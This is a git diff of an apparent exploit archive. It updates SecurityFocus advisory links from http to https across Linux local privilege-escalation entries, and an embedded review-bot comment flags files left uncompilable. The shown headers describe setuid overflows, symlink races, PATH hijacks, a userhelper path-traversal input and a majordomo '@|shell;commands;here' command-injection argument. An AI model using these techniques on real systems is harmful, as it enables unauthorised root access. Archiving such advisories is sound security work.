@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/525/info +source: https://www.securityfocus.com/bid/525/info Patrol 3.2, installed out of the box, allows for a local root compromise or denial of service. The vulnerability lies in the creation of a file by snmpagnt that is owned by the owner of the parent directory of the file and possibly world writeable. A local user can specify any file (/.rhosts) and create it / set the permissions according to the user's umask. diff --git a/exploits/linux/local/19428.c b/exploits/linux/local/19428.c index b6d2338c5..7e80ca60b 100644 --- a/exploits/linux/local/19428.c +++ b/exploits/linux/local/19428.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/536/info +source: https://www.securityfocus.com/bid/536/info There were a number of vulnerabilities in the Samba package pre-2.0.5. The first is a possible denial of service in nmbd (the netbios name service daemon), which resulted in nmbd spinning until killed. The second vulnerability known is a possible buffer overflow problem in smbd which is not exploit in the default install/configuration. A function in the messaging system could be exploited and arbitrary code executed as root if the "message command" was set in smb.conf. There was also a race condition vulnerability which could possible allow an attacker to mount arbitrary points in the filesystem if smbmnt was setuid root (which it is not by default). */ diff --git a/exploits/linux/local/19429.sh b/exploits/linux/local/19429.sh index 404223da8..aba652038 100755 --- a/exploits/linux/local/19429.sh +++ b/exploits/linux/local/19429.sh 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/538/info +source: https://www.securityfocus.com/bid/538/info Rational Software's ClearCase product includes a vulnerability whereby an unprivileged user can have any readable executable set to SUID root.. A 1.5 meg file is copied and then chmod'ed to SUID, and during the time this file is being copied it can be unlinked and replaced with another. diff --git a/exploits/linux/local/19464.c b/exploits/linux/local/19464.c index 776763e83..8fab9bfb4 100644 --- a/exploits/linux/local/19464.c +++ b/exploits/linux/local/19464.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/588/info +// source: https://www.securityfocus.com/bid/588/info A buffer overflow existed in libtermcap's tgetent() function, which could cause the user to execute arbitrary code if they were able to supply their own termcap file. Versions of libtermcap 2.0.8 and earliear are vulnerable. diff --git a/exploits/linux/local/19465.c b/exploits/linux/local/19465.c index 373c97ac9..9b2373f3b 100644 --- a/exploits/linux/local/19465.c +++ b/exploits/linux/local/19465.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/588/info +// source: https://www.securityfocus.com/bid/588/info A buffer overflow existed in libtermcap's tgetent() function, which could cause the user to execute arbitrary code if they were able to supply their own termcap file. Versions of libtermcap 2.0.8 and earliear are vulnerable. diff --git a/exploits/linux/local/19467.c b/exploits/linux/local/19467.c index 0dbce1b7b..e4ccdedf2 100644 --- a/exploits/linux/local/19467.c +++ b/exploits/linux/local/19467.c 
@@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/597/info +// source: https://www.securityfocus.com/bid/597/info // pt_chown is a program included with glibc 2.1.x that exists to aid the proper allocation of terminals for non-suid programs that don't have devpts support. It is installed setuid root, and is shipped with RedHat Linux 6.0. As it stands, pt_chown is vulnerable to an attack that allows malicious users to write aribtrary data to tty input/output streams (open file desciptors -> tty) that don't belong to them (you could theoretically get full control of the terminal). This is done by fooling the program into giving you access (it lacks security checks). Whether you can be compromised or not depends on the software you are using and whether it has support for devpts (screen, midnight commander, etc). The consequences are hijacking of terminals, possibly leading to a root compromise. diff --git a/exploits/linux/local/19469.c b/exploits/linux/local/19469.c index b28d5ece6..7733242a8 100644 --- a/exploits/linux/local/19469.c +++ b/exploits/linux/local/19469.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/602/info +// source: https://www.securityfocus.com/bid/602/info The version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflown in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack. diff --git a/exploits/linux/local/19470.c b/exploits/linux/local/19470.c index f1a305171..90ca89994 100644 --- a/exploits/linux/local/19470.c +++ b/exploits/linux/local/19470.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/602/info +// source: https://www.securityfocus.com/bid/602/info The version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflown in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack. diff --git a/exploits/linux/local/19474.txt b/exploits/linux/local/19474.txt index 90d27de03..90544d011 100644 --- a/exploits/linux/local/19474.txt +++ b/exploits/linux/local/19474.txt @@ -1,6 +1,6 @@ Caldera OpenLinux 2.2 ,Debian Linux 2.1/2.2,RedHat Linux <= 6.0 Vixie Cron MAILTO Sendmail Vulnerability -source: http://www.securityfocus.com/bid/611/info +source: https://www.securityfocus.com/bid/611/info Failure by the vixie cron daemon from validating the contents of a user supplied environment variable allow a malicious users to pass arbitrary command line arguments to sendmail while running as the root user. diff --git a/exploits/linux/local/19485.c b/exploits/linux/local/19485.c index bbf1d5810..ebf7ca566 100644 --- a/exploits/linux/local/19485.c +++ b/exploits/linux/local/19485.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/617/info +// source: https://www.securityfocus.com/bid/617/info There are several buffer overflows in the setuid root components of the Mars Netware Emulator package. They allow for a local root compromise through the overflowing of buffers without bounds checking. It is to be assumed that all versions prior to and including 0.99 are vulnerable to these attacks. diff --git a/exploits/linux/local/19499.c b/exploits/linux/local/19499.c index d0753d535..9bbce44a9 100644 --- a/exploits/linux/local/19499.c +++ b/exploits/linux/local/19499.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/638/info +// source: https://www.securityfocus.com/bid/638/info A buffer overflow vulnerability in the shared X library may allows local users to obtain higher privileges. Any setuid applications linked against the library are possibly vulnerable. The vulnerability is in the handling of the '-bg' command line parameter. diff --git a/exploits/linux/local/19500.c b/exploits/linux/local/19500.c index c26d2ca97..99d3f8114 100644 --- a/exploits/linux/local/19500.c +++ b/exploits/linux/local/19500.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/638/info +// source: https://www.securityfocus.com/bid/638/info A buffer overflow vulnerability in the shared X library may allows local users to obtain higher privileges. Any setuid applications linked against the library are possibly vulnerable. The vulnerability is in the handling of the '-bg' command line parameter. diff --git a/exploits/linux/local/19501.c b/exploits/linux/local/19501.c index 8b934500d..d3faf1568 100644 --- a/exploits/linux/local/19501.c +++ b/exploits/linux/local/19501.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/641/info +source: https://www.securityfocus.com/bid/641/info TRU64/DIGITAL UNIX 4.0 d/f,AIX <= 4.3.2,Common Desktop Environment <= 2.1 20, IRIX <= 6.5.14,Solaris <= 7.0,SunOS <= 4.1.4 TTSession Buffer Overflow Vulnerability diff --git a/exploits/linux/local/19508.sh b/exploits/linux/local/19508.sh index 46e119adf..a48571af7 100755 --- a/exploits/linux/local/19508.sh +++ b/exploits/linux/local/19508.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/656/info +source: https://www.securityfocus.com/bid/656/info A buffer overflow vulnerability in sscw's handling of the HOME environment variable allows local users to gain root privileges. diff --git a/exploits/linux/local/19510.pl b/exploits/linux/local/19510.pl index da4c6bd53..f9ef5707a 100755 --- a/exploits/linux/local/19510.pl 
+++ b/exploits/linux/local/19510.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/660/info +source: https://www.securityfocus.com/bid/660/info A vulnerability in SSH's creation of the authentication agent UNIX domain socket allows local users to create a UNIX domain socket with an arbitrary file name in the system. diff --git a/exploits/linux/local/19511.c b/exploits/linux/local/19511.c index cab77721c..142e106c0 100644 --- a/exploits/linux/local/19511.c +++ b/exploits/linux/local/19511.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/661/info +source: https://www.securityfocus.com/bid/661/info Knox Software Arkeia 4.0 Backup rnavc & nlserverd HOME Environment Variable Buffer Overflow diff --git a/exploits/linux/local/19512.sh b/exploits/linux/local/19512.sh index 7e524fab7..927e89e28 100755 --- a/exploits/linux/local/19512.sh +++ b/exploits/linux/local/19512.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/663/info +source: https://www.securityfocus.com/bid/663/info A buffer overflow vulnerabilityin GNOME's shared libraries handling of the 'espeaker' command line argument may allow local users to attack setuid binaries linked against these libraries to obtain root access. diff --git a/exploits/linux/local/19544.c b/exploits/linux/local/19544.c index 6555360ed..bb0d90a5c 100644 --- a/exploits/linux/local/19544.c +++ b/exploits/linux/local/19544.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/707/info +source: https://www.securityfocus.com/bid/707/info BSD/OS 2.1,FreeBSD 2.1.5,NeXTstep 4.0/4.1,SGI IRIX 6.4,SunOS 4.1.3/4.1.4 lpr Buffer Overrun Vulnerability (1) diff --git a/exploits/linux/local/19565.sh b/exploits/linux/local/19565.sh index 135088dec..57c2080ed 100755 --- a/exploits/linux/local/19565.sh +++ b/exploits/linux/local/19565.sh 
@@ -1,5 +1,5 @@ #! /bin/sh -#source: http://www.securityfocus.com/bid/738/info +#source: https://www.securityfocus.com/bid/738/info # #cdwtools is a package of utilities for cd-writing. The linux version of these utilities, which ships with S.u.S.E linux 6.1 and 6.2, is vulnerable to several local root #compromises. It is known that there are a number of ways to exploit these packages, including buffer overflows and /tmp symlink attacks. # diff --git a/exploits/linux/local/19602.c b/exploits/linux/local/19602.c index e7dfba891..32bf911d5 100644 --- a/exploits/linux/local/19602.c +++ b/exploits/linux/local/19602.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/774/info +// source: https://www.securityfocus.com/bid/774/info Through exploiting a combination of seemingly low-risk vulnerabilities in sendmail, it is possible for a malicious local user to have an arbitrary program inherit (or "hijack") the file descriptor for the socket listening on (priviliged) port 25. diff --git a/exploits/linux/local/19655.txt b/exploits/linux/local/19655.txt index e1989a87b..4e4c9c263 100644 --- a/exploits/linux/local/19655.txt +++ b/exploits/linux/local/19655.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/843/info +source: https://www.securityfocus.com/bid/843/info A buffer overflow vulnerability exists in the RSAREF cryptographic library which may possibly make any software using the library vulnerable. diff --git a/exploits/linux/local/19676.c b/exploits/linux/local/19676.c index cde486107..b231e2d2d 100644 --- a/exploits/linux/local/19676.c +++ b/exploits/linux/local/19676.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/871/info +// source: https://www.securityfocus.com/bid/871/info Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console. 
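Review bot: In exploits/linux/local/19676.c (and 19602.c just above it) only the `source:` line gains a `//` prefix, so the description that follows ("Certain versions of FreeBSD (3.3 Confirmed) ...") is still bare prose at the top of a .c file and the file remains uncompilable. Either comment out the whole header, as 19467.c does with `//` on both lines and 19677.c does by opening with `/*`, or keep this commit to the http-to-https change and add comment markers in a separate change that covers every header line.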
diff --git a/exploits/linux/local/19677.c b/exploits/linux/local/19677.c index 68bb46a08..845c80666 100644 --- a/exploits/linux/local/19677.c +++ b/exploits/linux/local/19677.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/871/info +source: https://www.securityfocus.com/bid/871/info Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console. diff --git a/exploits/linux/local/19698.txt b/exploits/linux/local/19698.txt index 771d65e23..173fba6c3 100644 --- a/exploits/linux/local/19698.txt +++ b/exploits/linux/local/19698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/902/info +source: https://www.securityfocus.com/bid/902/info It is possible to execute arbitrary commands with elevated privileges through exploiting the majordomo binary, "resend". A setuid root wrapper program calls resend after setuid()ing and setgid()ing to lowered (but still elevated) privileges which it runs resend with. resend contains a call to open() (it is a perl script), which can be made to execute shell commands if a '|' is the first character it is passed, so if the first parameter to resend is '@|shell;commands;here', the shell commands will be executed with resend's privileges. diff --git a/exploits/linux/local/19699.txt b/exploits/linux/local/19699.txt index 8ec5cfdd4..2778d5f13 100644 --- a/exploits/linux/local/19699.txt +++ b/exploits/linux/local/19699.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/903/info +source: https://www.securityfocus.com/bid/903/info It is possible for a local user to gain majordomo privileges through a vulnerability which allows privileged arbitrary commands to be executed. If the -C parameter is passed to majordomo (or one of several other scripts) when run with the setuid root wrapper, the argument to -C will be executed with majordomo privileges. diff --git a/exploits/linux/local/19700.c b/exploits/linux/local/19700.c index 69db75468..e441572e5 100644 --- a/exploits/linux/local/19700.c +++ b/exploits/linux/local/19700.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/903/info +// source: https://www.securityfocus.com/bid/903/info It is possible for a local user to gain majordomo privileges through a vulnerability which allows privileged arbitrary commands to be executed. If the -C parameter is passed to majordomo (or one of several other scripts) when run with the setuid root wrapper, the argument to -C will be executed with majordomo privileges. diff --git a/exploits/linux/local/19709.sh b/exploits/linux/local/19709.sh index f8e352169..2bd90940b 100755 --- a/exploits/linux/local/19709.sh +++ b/exploits/linux/local/19709.sh 
@@ -1,6 +1,6 @@ Mandrake 6.0/6.1,RedHat 6.0/6.1,Turbolinux 3.5 b2/4.2/4.4/6.0.2 userhelper/PAM Path Vulnerability (1) -source: http://www.securityfocus.com/bid/913/info +source: https://www.securityfocus.com/bid/913/info Because of double path vulnerabilities in the binary userhelper and PAM, it is possible to get root locally on RedHat 6.0 and 6.1 systems. Both userhelper and PAM follow ".." paths and userhelper allows you to specifiy a program to execute as an argument to the -w parameter (which is expected to have an entry in /etc/security/console.apps). Because of this, it's possible to specifiy a program such as "../../../tmp/myprog", which would (to userhelper) be "/etc/security/console.apps/../../../tmp/myprog". If "myprog" exists, PAM will then try to execute it (with the same filename). PAM first does a check to see if the configuration file for "../../../tmp/myprog" is in /etc/pam.d/ but also follows ".." directories -- to an attacker's custom pam configuration file. Specified inside the malicious configuration file (/tmp/myprog) would be arbitrary shared libraries to be opened with setuid privileges. The arbitrary libraries can be created by an attacker specifically to compromise superuser access, activating upon dlopen() by PAM. diff --git a/exploits/linux/local/19710.c b/exploits/linux/local/19710.c index da70867b5..d0f7d312c 100644 --- a/exploits/linux/local/19710.c +++ b/exploits/linux/local/19710.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/913/info +// source: https://www.securityfocus.com/bid/913/info Because of double path vulnerabilities in the binary userhelper and PAM, it is possible to get root locally on RedHat 6.0 and 6.1 systems. Both userhelper and PAM follow ".." paths and userhelper allows you to specifiy a program to execute as an argument to the -w parameter (which is expected to have an entry in /etc/security/console.apps). Because of this, it's possible to specifiy a program such as "../../../tmp/myprog", which would (to userhelper) be "/etc/security/console.apps/../../../tmp/myprog". If "myprog" exists, PAM will then try to execute it (with the same filename). PAM first does a check to see if the configuration file for "../../../tmp/myprog" is in /etc/pam.d/ but also follows ".." directories -- to an attacker's custom pam configuration file. Specified inside the malicious configuration file (/tmp/myprog) would be arbitrary shared libraries to be opened with setuid privileges. The arbitrary libraries can be created by an attacker specifically to compromise superuser access, activating upon dlopen() by PAM. diff --git a/exploits/linux/local/19723.txt b/exploits/linux/local/19723.txt index 9a0ab82d1..78dacddaa 100644 --- a/exploits/linux/local/19723.txt +++ b/exploits/linux/local/19723.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/928/info +source: https://www.securityfocus.com/bid/928/info A component of the "Corel Update" utility distributed with Corel's Linux OS is vulnerable to a local PATH vulnerability. The binary "get_it", which is stored in /usr/X11R6/bin, is setuid root installed by default on all Corel LinuxOS systems (it's part of their .deb package install/update utils). get_it relies on PATH to be valid when it calls 'cp' (without the full path), making it possible to spawn an arbitrary program (called 'cp') with inherited root privs by changing the first searched path to one in which a malicious cp lies. The consequences are immediate local root compromise. diff --git a/exploits/linux/local/19727.c b/exploits/linux/local/19727.c index 118988e5b..8f51d76f6 100644 --- a/exploits/linux/local/19727.c +++ b/exploits/linux/local/19727.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/942/info +// source: https://www.securityfocus.com/bid/942/info Vpopmail (vchkpw) is free GPL software package built to help manage virtual domains and non /etc/passwd email accounts on Qmail mail servers. This package is developed by Inter7 (Referenced in the 'Credit' section) and is not shipped, maintained or supported by the main Qmail distribution. diff --git a/exploits/linux/local/19735.txt b/exploits/linux/local/19735.txt index 3ba31a2c3..53155ef8d 100644 --- a/exploits/linux/local/19735.txt +++ b/exploits/linux/local/19735.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/958/info +source: https://www.securityfocus.com/bid/958/info A vulnerability exists in the apcd package, as shipped in Debian GNU/Linux 2.1. By sending the apcd process a SIGUSR1, a file will be created in /tmp called upsstat. This file contains information about the status of the APC device. This file is not opened securely, however, and it is possible for an attacker to create a symlink with this name to another place on the file system. This could, in turn, lead to a compromise of the root account. diff --git a/exploits/linux/local/19762.c b/exploits/linux/local/19762.c index d9f6c2bf0..ed6db2272 100644 --- a/exploits/linux/local/19762.c +++ b/exploits/linux/local/19762.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1003/info +// source: https://www.securityfocus.com/bid/1003/info FTP Explorer includes the option to store profiles of visited FTP sites. The user's name and password can also be stored. These stored values are kept in the registry, under the key HKCU\Software\FTP Explorer\Profiles\ProfileName\ . The password is encrypted, but the encryption mechanism is weak and can easily be broken. diff --git a/exploits/linux/local/19763.txt b/exploits/linux/local/19763.txt index a9efd3f3e..0c88fc138 100644 --- a/exploits/linux/local/19763.txt +++ b/exploits/linux/local/19763.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1005/info +source: https://www.securityfocus.com/bid/1005/info A vulnerability exists in the manner in which RedHat Linux 6.0 protects the obtaining of a shell by booting single user mode. RedHat will prompt for the root password upon entering single user mode. Pressing ^C (causing a SIGINT to be sent) immediately results in a root shell being made available. diff --git a/exploits/linux/local/19764.txt b/exploits/linux/local/19764.txt index 6c4e82d37..f8a7acc82 100644 --- a/exploits/linux/local/19764.txt +++ b/exploits/linux/local/19764.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1007/info +source: https://www.securityfocus.com/bid/1007/info Several vulnerabilities exist in the buildxconfig program, as included with Corel Linux 1.0. Using this program, it is likely that a local user could elevate privileges. diff --git a/exploits/linux/local/19765.txt b/exploits/linux/local/19765.txt index baee77edc..b89e02a80 100644 --- a/exploits/linux/local/19765.txt +++ b/exploits/linux/local/19765.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1008/info +source: https://www.securityfocus.com/bid/1008/info A vulnerability exists in the setxconf utility, as shipped with Corel Linux 1.0. The -T option to setxconf will run xinit, which euid root. xinit, when executed, will invoke the contents on ~/.xserverrc. A malicious user could therefore execute commands as root. diff --git a/exploits/linux/local/19778.c b/exploits/linux/local/19778.c index e602fd234..818ddc5ab 100644 --- a/exploits/linux/local/19778.c +++ b/exploits/linux/local/19778.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1011/info +source: https://www.securityfocus.com/bid/1011/info RedHat 4.0/4.1/4.2/5.0/5.1/5.2/6.0/6.2,RedHat man 1.5,Turbolinux man 1.5,Turbolinux 3.5/4.2/4.4 man Buffer Overrun Vulnerability diff --git a/exploits/linux/local/19779.c b/exploits/linux/local/19779.c index 360d7b6df..90eef214a 100644 --- a/exploits/linux/local/19779.c +++ b/exploits/linux/local/19779.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1011/info +source: https://www.securityfocus.com/bid/1011/info RedHat 4.0/4.1/4.2/5.0/5.1/5.2/6.0/6.2,RedHat man 1.5,Turbolinux man 1.5,Turbolinux 3.5/4.2/4.4 man Buffer Overrun Vulnerability diff --git a/exploits/linux/local/19787.txt b/exploits/linux/local/19787.txt index a9053daae..2dfead473 100644 --- a/exploits/linux/local/19787.txt +++ b/exploits/linux/local/19787.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1030/info +source: https://www.securityfocus.com/bid/1030/info A vulnerability exists in the configuration of Dosemu, the DOS emulator, as shipped with Corel Linux 1.0. Dosemu documentation cautions that the system.com binary should not be made available to users, as it implements the system() libc call. Users can use this command to execute commands as root, and obtain elevated access to the system. diff --git a/exploits/linux/local/19794.txt b/exploits/linux/local/19794.txt index 6d1274afd..cb1d0a1a6 100644 --- a/exploits/linux/local/19794.txt +++ b/exploits/linux/local/19794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1035/info +source: https://www.securityfocus.com/bid/1035/info A vulnerability exists in the installation program for Oracle 8.1.5i. The Oracle installation scripts will create a directory named /tmp/orainstall, owned by oracle:dba, mode 711. Inside of this directory it will create a shell script named orainstRoot.sh, mode 777. The installation script will then stop and ask the person installing to run this script. The installation program at no point attempts to determine if the directory or script already exist. This makes it possible to create a symbolic link from the orainstRoot.sh file to elsewhere on the file system. This could be used to create a .rhosts file, for instance, and gain access to the root account. In addition, since the orainstRoot.sh file is mode 777, it is possible for any user on the machine to edit this script to execute arbitrary commands when run by root. Again, this can result in the compromise of the root account. diff --git a/exploits/linux/local/19802.c b/exploits/linux/local/19802.c index 1ea4e1e75..bfb322945 100644 --- a/exploits/linux/local/19802.c +++ b/exploits/linux/local/19802.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1047/info +// source: https://www.securityfocus.com/bid/1047/info wmcdplay is cdplayer generally used with the WindowMaker X11 window-manager on unix systems. While wmcdplay is rarely installed at all by default, when it is installed it is typically set setuid root. wmcdplay is vulnerable to a buffer overflow attack due to lack of bounds checking on an argument it is passed. As a result, a local user can elevate their priviliges to root through overruning the stack and executing arbitrary code with the effective user-id of the process (root). diff --git a/exploits/linux/local/19803.txt b/exploits/linux/local/19803.txt index 4a23fa132..cc45d74dd 100644 --- a/exploits/linux/local/19803.txt +++ b/exploits/linux/local/19803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1047/info +source: https://www.securityfocus.com/bid/1047/info wmcdplay is cdplayer generally used with the WindowMaker X11 window-manager on unix systems. While wmcdplay is rarely installed at all by default, when it is installed it is typically set setuid root. wmcdplay is vulnerable to a buffer overflow attack due to lack of bounds checking on an argument it is passed. As a result, a local user can elevate their priviliges to root through overruning the stack and executing arbitrary code with the effective user-id of the process (root). diff --git a/exploits/linux/local/19804.pl b/exploits/linux/local/19804.pl index c72156fe1..035273ea4 100755 --- a/exploits/linux/local/19804.pl +++ b/exploits/linux/local/19804.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1048/info +source: https://www.securityfocus.com/bid/1048/info atsar is a linux load monitoring software package released under the GPL by AT Computing. atsadc is a setuid root binary that is included in the atsar package. atsadc is setuid because it obtains informatin via /dev/kmem. atsadc will accept as an argument an output file, which it will open -- without checking to make sure the user executing atsadc has the priviliges to do so. After it has opened and created (or overwritten) the target file as root, the permissions set on the file will allow the attacker to write to it. Since this file is arbitrary, it is possible to gain root locally in any number of ways through creating malicious system files. In Teso's proof of concept exploit, root priviliges are gained by creating a malicious shared library to be preloaded and creating/specifying that library in /etc/ld.so.preload (and then executing a setuid binary..). diff --git a/exploits/linux/local/19811.c b/exploits/linux/local/19811.c index 1322f7641..fa07414f7 100644 --- a/exploits/linux/local/19811.c +++ b/exploits/linux/local/19811.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1060/info +// source: https://www.securityfocus.com/bid/1060/info A vulnerability exists in the 'imwheel' package for Linux. This package is known to be vulnerable to a buffer overrun in its handling of the HOME environment variable. By supplying a sufficiently long string containing machine executable code, the imwheel program can be caused to run arbitrary commands as root. This is due to a setuid root perl script named 'imwheel-solo' which invokes the imwheel program with effective UID 0. diff --git a/exploits/linux/local/19812.c b/exploits/linux/local/19812.c index 614cd6499..64d6a7fab 100644 --- a/exploits/linux/local/19812.c +++ b/exploits/linux/local/19812.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1060/info +// source: https://www.securityfocus.com/bid/1060/info A vulnerability exists in the 'imwheel' package for Linux. This package is known to be vulnerable to a buffer overrun in its handling of the HOME environment variable. By supplying a sufficiently long string containing machine executable code, the imwheel program can be caused to run arbitrary commands as root. This is due to a setuid root perl script named 'imwheel-solo' which invokes the imwheel program with effective UID 0. diff --git a/exploits/linux/local/19813.txt b/exploits/linux/local/19813.txt index 6df9dc59b..6a8222a1b 100644 --- a/exploits/linux/local/19813.txt +++ b/exploits/linux/local/19813.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1061/info +source: https://www.securityfocus.com/bid/1061/info A vulnerability exists in the kreatecd program for Linux. This program is a graphical front end to the cdrecord program, and is installed setuid root. This program will blindly trust the configuration of the path to cdrecord, as specified by the user. This means that arbitrary programs can be executed as root by an attacker using kreatecd. It appears that graphical interaction is required to exploit this program. diff --git a/exploits/linux/local/19816.txt b/exploits/linux/local/19816.txt index a645b965a..adb9eef09 100644 --- a/exploits/linux/local/19816.txt +++ b/exploits/linux/local/19816.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1069/info +source: https://www.securityfocus.com/bid/1069/info A vulnerability exists in the gpm-root program, part of the gpm package. This package is used to enable mice on the consoles of many popular Linux distributions. The problem is a design error, caused when a programmer chose to attempt to revert to the running users groups, after having called setuid to the users id already. The setgid call fails, and the process maintains the groups the gpm-root program is running as. This is usually the 'root' group. diff --git a/exploits/linux/local/19837.c b/exploits/linux/local/19837.c index 010472cc9..515591856 100644 --- a/exploits/linux/local/19837.c +++ b/exploits/linux/local/19837.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1096/info +// source: https://www.securityfocus.com/bid/1096/info Bray Systems Linux Trustees is an access control program which manages user permissions similar to implementations of Netware. Requesting an unusually long file or directory path will cause the application to hang. Other processes may also be affected. In order to regain normal functionality, the user must reboot the machine. diff --git a/exploits/linux/local/19838.c b/exploits/linux/local/19838.c index 666266d26..09c7103e6 100644 --- a/exploits/linux/local/19838.c +++ b/exploits/linux/local/19838.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1097/info +// source: https://www.securityfocus.com/bid/1097/info CRYPTOCard CRYPTOAdmin is a network authentication application for use with the Palm OS platform. CRYPTOAdmin generates a .pdb file which contains the username, PIN number, serial number, and key in encrypted or plaintext format. The PIN number can be retrieved due to the software's usage of a fixed 4-byte value in key generation. With access to the .pdb file and PIN number, a user is capable of duplicating the token onto another Palm device effectively gaining access to the network as the compromised user. diff --git a/exploits/linux/local/19867.txt b/exploits/linux/local/19867.txt index 8978552c4..d5b4cec5b 100644 --- a/exploits/linux/local/19867.txt +++ b/exploits/linux/local/19867.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1130/info +source: https://www.securityfocus.com/bid/1130/info A vulnerability exists in SuSE Linux, version 6.3 and prior, that can allow arbitrary users to delete any file on the system. If the MAX_DAYS_IN_TMP variable is set in /etc/rc.config to be larger than 0, any local user can remove any file on the system. This is due to a flaw in /etc/cron.daily/aaa_base in SuSE 6.3, or /root/bin/cron.daily in older versions. diff --git a/exploits/linux/local/19883.c b/exploits/linux/local/19883.c index cda0246d6..0c9b45f5c 100644 --- a/exploits/linux/local/19883.c +++ b/exploits/linux/local/19883.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1155/info +// source: https://www.securityfocus.com/bid/1155/info A vulnerability exists in the handling of the DISPLAY variable, in versions of Gnomelib shipped with S.u.S.E. Linux, version 6.3. By supplying a long buffer containing machine executable code in the DISPLAY environment variable, it is possible to execute arbitrary code with the permissions of the user running the binary. In the case of a setuid binary, it is possible to obtain the privileges of the user it is setuid to. This in turn may be used to elevate privileges, and in theory could result in local root compromise. diff --git a/exploits/linux/local/19900.c b/exploits/linux/local/19900.c index 11872503b..d21b94970 100644 --- a/exploits/linux/local/19900.c +++ b/exploits/linux/local/19900.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1176/info +source: https://www.securityfocus.com/bid/1176/info A vulnerability exists in the pam_console PAM module, included as part of any Linux system running PAM. pam_console exists to own certain devices to users logging in to the console of a Linux machine. It is designed to allow only console users to utilize things such as sound devices. It will chown devices to users upon logging in, and chown them back to being owned by root upon logout. However, as certain devices do not have a 'hangup' mechanism, like a tty device, it is possible for a local user to continue to monitor activity on certain devices after logging out. This could allow an malicious user to sniff other users console sessions, and potentially obtain the root password if the root user logs in, or a user su's to root. They could also surreptitiously execute commands as the user on the console. */ diff --git a/exploits/linux/local/19915.txt b/exploits/linux/local/19915.txt index c567cabdf..b91a61272 100644 --- a/exploits/linux/local/19915.txt +++ b/exploits/linux/local/19915.txt 
